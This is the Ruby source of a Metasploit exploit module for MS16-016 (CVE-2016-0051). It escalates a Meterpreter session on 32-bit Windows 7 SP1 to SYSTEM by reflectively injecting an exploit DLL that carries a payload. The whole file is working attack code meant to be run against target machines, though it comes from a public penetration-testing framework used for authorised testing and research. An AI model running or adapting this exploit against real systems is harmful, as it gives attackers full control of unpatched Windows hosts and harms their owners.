metasploit-gs/modules/exploits/windows/local/ms16_016_webdav.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::FileInfo
  include Msf::Post::Windows::ReflectiveDLLInjection

  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => 'MS16-016 mrxdav.sys WebDav Local Privilege Escalation',
          'Description' => %q{
            This module exploits the vulnerability in mrxdav.sys described by MS16-016.  The module will spawn
            a process on the target system and elevate its privileges to NT AUTHORITY\SYSTEM before executing
            the specified payload within the context of the elevated process.
          },
          'License' => MSF_LICENSE,
          'Author' => [
            'Tamas Koczka', # Original Exploit
            'William Webb <william_webb[at]rapid7.com>' # C port and Metasploit module
          ],
          'Arch' => ARCH_X86,
          'Platform' => 'win',
          'SessionTypes' => [ 'meterpreter' ],
          'DefaultOptions' => {
            'EXITFUNC' => 'thread',
            'DisablePayloadHandler' => false
          },
          'Targets' => [
            [ 'Windows 7 SP1', {} ]
          ],
          'Payload' => {
            'Space' => 4096,
            'DisableNops' => true
          },
          'References' => [
            [ 'CVE', '2016-0051' ],
            [ 'MSB', 'MS16-016' ]
          ],
          'DisclosureDate' => '2016-02-09',
          'DefaultTarget' => 0,
          'Notes' => {
            'Reliability' => UNKNOWN_RELIABILITY,
            'Stability' => UNKNOWN_STABILITY,
            'SideEffects' => UNKNOWN_SIDE_EFFECTS
          }
        }
      )
    )
  end

  def check
    if sysinfo["Architecture"] == ARCH_X64
      return Exploit::CheckCode::Safe
    end

    Exploit::CheckCode::Detected
  end

  def exploit
    if is_system?
      fail_with(Failure::None, 'Session is already elevated')
    end

    if sysinfo["Architecture"] == ARCH_X64
      fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
    end

    print_status('Launching a process to host the payload DLL, then reflectively injecting the DLL and running it...')
    encoded_payload = payload.encoded
    execute_dll(
      ::File.join(Msf::Config.data_directory, "exploits", "cve-2016-0051", "cve-2016-0051.x86.dll"),
      encoded_payload
    )
    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
    sleep(3)
  end
end